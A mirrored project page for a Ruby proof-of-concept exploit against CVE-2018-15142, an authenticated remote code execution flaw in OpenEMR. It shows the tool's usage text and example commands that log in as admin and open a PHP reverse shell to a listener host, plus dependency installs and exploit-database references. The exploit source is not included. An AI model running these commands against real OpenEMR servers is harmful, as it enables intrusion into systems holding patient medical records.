Sahara云大数据>> OpenEMR-RCE>> 返回
项目作者: noraj

项目描述 :
OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution
高级语言: Ruby
项目地址: git://github.com/noraj/OpenEMR-RCE.git
创建时间: 2020-07-16T18:52:15Z
项目社区:https://github.com/noraj/OpenEMR-RCE
开源协议:MIT License
下载


OpenEMR RCE exploit / PoC

OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution

Exploit for CVE-2018-15142.

[EDB-49486] [PacketStorm] [WLB-2020080011]

Usage

  1. $ ruby exploit.rb --help
  2. OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution
  4. Usage:
  5.   exploit.rb manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
  6.   exploit.rb semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
  7.   exploit.rb auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
  8.   exploit.rb -H | --help
  10. Options:
  11.   -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
  12.   -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
  13.   -u <username>, --user <username>      Username of the admin
  14.   -p <password>, --password <password>  Password of the admin
  15.   -m <payload>, --payload <payload>     Metasploit PHP payload
  16.   -h <host>, --lhost <host>             Reverse shell local host
  17.   -t <port>, --lport <port>             Reverse shell local port
  18.   --debug                               Display arguments
  19.   -H, --help                            Show this screen
  21. Examples:
  22.   exploit.rb manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
  23.   exploit.rb semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
  24.   exploit.rb auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999

Modes

  • Auto: you know the target and have your listener ready, let the exploit handle the rest
  • Semit-auto: same as auto but you would like to specify another payload than the default php/reverse_php
  • Manual: you already have a custom PHP reverse shell, the exploit lets you specify it

Requirements

Example for BlackArch:

  1. pacman -S ruby-httpclient ruby-docopt metasploit

Example using gem:

  1. gem install httpclient docopt

Reference

This is a better re-write of EDB-ID-48515 and implementation of EDB-ID-45202 part 2:

  • using arguments (instead of hardcoded values)
  • allowing custom PHP reverse shell or auto generating one with msfconsole
  • cleaner & more customizable
  • using ruby (python2 is deprecated)

This exploit was tested with Ruby 2.7.1.

About EDB-ID-48515:

  1. Exploit Author: Musyoka Ian
  2. Date: 2020-05-25
  3. Vendor Homepage: https://www.open-emr.org/
  4. Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
  5. Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile 
  6. Version: < 5.0.1 (Patch 4)
  7. Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
  8. References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69